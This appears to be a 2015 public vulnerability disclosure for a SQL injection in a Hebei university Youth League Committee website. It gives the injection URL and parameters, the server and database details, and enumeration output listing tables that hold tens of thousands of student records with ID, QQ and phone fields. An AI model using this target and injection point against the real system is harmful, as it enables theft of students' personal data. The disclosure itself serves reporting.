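2015-07-05: Details reported to the vendor; awaiting vendor response.
2015-07-10: The vendor actively ignored the vulnerability; details disclosed to the public.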
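SQL injection vulnerability exposing national ID numbers, QQ email addresses, and mobile phone numbers.
Site: http://124.239.192.62/ (Hebei University of Economics and Business, Youth League Committee)
Injection point: http://124.239.192.62//SS_jieguo.aspx?Class=a&Title=Mr. (GET)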
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [6]:
[*] 2012_win
[*] gongqingtuan
[*] master
[*] model
[*] msdb
[*] tempdb
Database: gongqingtuan
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| dbo.t_student      | 38726   |
| dbo.student_manger | 38724   |
| dbo.t_jiangcheng   | 3448    |
| dbo.t_class        | 1145    |
| dbo.class_manger   | 1138    |
| dbo.t_admin        | 1037    |
| dbo.studentAdmin   | 896     |
| dbo.user_class     | 896     |
| dbo.t_speciality   | 172     |
| dbo.zhuanye_manger | 168     |
| dbo.user_college   | 28      |
| dbo.t_college      | 24      |
| dbo.t_contorl      | 1       |
+--------------------+---------+
Database: gongqingtuan
Table: t_student
| id | Cid | Cd | Sd | QQ | tel |
Filter special parameters at the injection point.
Severity: no impact (ignored by the vendor)
Ignored at: 2015-07-10 10:10
None yet.